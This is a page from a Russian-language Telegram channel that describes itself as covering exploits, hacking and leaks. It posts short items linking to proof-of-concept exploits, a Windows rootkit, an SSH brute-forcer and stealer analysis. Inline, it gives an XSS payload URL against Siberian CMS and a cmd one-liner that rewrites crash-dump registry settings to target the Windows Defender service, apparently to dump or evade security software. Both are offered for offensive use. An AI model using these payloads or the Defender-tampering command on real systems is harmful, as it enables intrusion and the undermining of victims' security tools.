Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
CVE-2025-24118
*
An XNU kernel race condition bug
*
WriteUP
*
POC
👍10
Повышение привилегий в Linux с помощью IPTABLES
*
WriteUP
(работать будет скорее на встроенных устройствах, нежели на современных дистрах, но круто)
👍25🔥18
Vidar stealer - подробнейший Reverse Engineering зверька.
*
Link
🔥33😱3👍2
CVE-2025-21293 Exploit (Active Directory Domain Services)
*
WTF
*
POC exploit
👍18😱1
Да уймите уже кто-нибудь эту панду или как променять бамбук на ELF/Sshdinjector.A
*
Chinese cyberspies use new SSH backdoor in network device hacks

#ssh #china #backdoor #bamboo
👍14
BlitzSSH - SSH Cracking Tool
*
Казалось бы брутфорсер, но формат подачи данных интересный.
Ну и в телегу стучит по случаю.
Link


#ssh #bruteforce
👍14
Помните кулл-стори про 0day в 7zip когда RU хакеры поблэчили UA гос. организации и через них же раскидывали малварь в сентябре 2024 года (SmokeLoader malware) ?
Так вот, есть продолжение ))))
Новый год, новые дыры - CVE-2025-0411
README
🔥36👍6😱2
CVE-2024-36972
*
Два в одном !
Linux LPE and Container Escape
*
vulnerability affects Linux kernel versions:
v6.8 to v6.9
v5.15.147
v6.1.78
v6.6.17

POC exploit

#Linux #lpe #container #escape
🔥18😱5👍4
CVE-2025-22604
(CVSS 9.1)
Remote Code Execution Flaw in Cacti
*
POC
👍20
CVE-2025-1105
*
Siberian CMS (version - 4.20.6)
*
POC

https://x.x.x.x/app/sae/design/desktop/flat"><img src=x onerror=alert(document.location)>/js/bootstrap-tagsinput.min.js
👍12🔥4😱2
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2025-23369
*
bypass SAML authentication on GitHub Enterprise
*
WriteUP
*
Exploit
🔥30👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Кто же такой хакер Bratva ?
*
В рамках специального расследования, в нашу редакцию попала секретная VHS запись.
Проанализировав которую, были установлены следующие лица:
Петер Севера
Петр Левашов
Юрист Насковец
Статисты - кадровые офицеры редакции gaz3ta.ru
🔥25😱7👍3
This media is not supported in your browser
VIEW IN TELEGRAM
22летняя RCE в GameBoy
*
Пора патчить тамагочи !
*
WriteUP
🔥11👍4
CVE-2024-12754 AnyDesk
*
wtf
*
LPE poc exploit
👍11😱4
Лидеры среди Telegram-каналов по кибербезопасности
*
полный рейтинг 450 каналов со ссылками

😎
🔥15😱6👍2
EDR dump (for fun разумеется)

cmd /v/c "set R=reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /f /v&!R! CrashDumpEnabled /d 7 /t 4&!R! DumpFileSize /d 666 /t 4&for /f "delims=*" %i in ('sc qc WinDefend^|find "PATH_"')do (set t=%i&!R! DedicatedDumpFile /d !t:~29,-1!)"
👍14🔥9
Sunder
*
Это Windows Rootkit на основе Fudmodule Rootkit от Lazarus Group. Ссылка на эту версию Sunder для примера эксплойта драйвера Appid.sys
Уязвимый драйвер Сандера в этой репе GitHub является драйвер Dell dbutil_2_3.sys ( драйвер заблокирован Microsoft).
Сначала нужно разлочить драйвер (см описание в репе)
Sunder Rootkit
👍12🔥5😱4
опа
😱129👍25🔥5
Извините))))
🔥71👍12😱6
onliner
curl -s https://URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u
👍25😱7